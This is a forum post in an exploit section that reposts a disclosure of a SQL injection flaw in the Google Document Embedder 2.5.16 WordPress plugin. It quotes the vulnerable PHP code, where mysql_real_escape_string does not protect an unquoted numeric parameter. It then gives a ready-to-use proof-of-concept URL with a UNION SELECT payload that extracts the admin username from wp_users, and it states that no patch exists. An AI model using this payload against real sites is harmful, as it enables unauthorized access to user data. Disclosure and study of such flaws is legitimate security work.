Jump to content
Aerosol

Google Document Embedder 2.5.16 SQL Injection

By Aerosol, in Exploituri

Recommended Posts

Aerosol Newbie

Aerosol

Posted
Posted
Google Document Embedder version 2.5.16 suffers from a mysql_real_escape_string bypass SQL injection vulnerability.

Here source

Exploit Title : Google Document Embedder 2.5.16 mysql_real_escpae_string bypass SQL Injection
Data : 2014 – 12 -03
Exploit Author : Securely (Yoo Hee man)
Plugin : google-document-embedder
Fixed version : N/A
Software Link : https://downloads.wordpress.org/plugin/google-document-embedder.2.5.16.zip

1. Detail
- Google Document Embedder v2.5.14 have SQL Injection
- This Plugin v2.5.16 uses mysql_real_escape_string function has been patched to SQL Injection.
- but mysql_real_escape_string() function is bypass possible
- vulnerability file : /google-document-embedder/~view.php

================================================================
50  // get profile
51  if ( isset( $_GET['gpid'] ) ) {
52      $gpid = mysql_real_escape_string( $_GET['gpid'] );
        //mysql_real_escape_string() is bypass
53      if ( $profile = gde_get_profile( $gpid ) ) {
54          $tb = $profile['tb_flags'];
55          $vw = $profile['vw_flags'];
56          $bg = $profile['vw_bgcolor'];
57          $css = $profile['vw_css'];
58      }
59  }
================================================================

===============================================================
373 function gde_get_profile( $id ) {
374 global $wpdb;
375 $table = $wpdb->prefix . 'gde_profiles';
376
377 $profile = $wpdb->get_results( "SELECT * FROM $table WHERE

profile_id = $id", ARRAY_A );
378 $profile = unserialize($profile[0]['profile_data']);
379
380 if ( is_array($profile) ) {
381     return $profile;
382 } else {
383     return false;
384 }
385 }
================================================================

2. POC
http://target/wp-content/plugins/google-document-embedder/~view.php?embedded=1&gpid=0%20UNION%20SELECT%201,%202,%203,%20CONCAT(CAST(CHAR(97,%2058,%2049,%2058,%20123,%20115,%2058,%2054,%2058,%2034,%20118,%20119,%2095,%2099,%20115,%20115,%2034,%2059,%20115,%2058)%20as%20CHAR),%20LENGTH(user_login),%20CAST(CHAR(58,%2034)%20as%20CHAR),%20user_login,%20CAST(CHAR(34,%2059,%20125)%20as%20CHAR))%20FROM%20wp_users%20WHERE%20ID=1

3. Solution:
Not patched

4. Discovered By : Securely(Yoo Hee man)
                 God2zuzu@naver.com

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...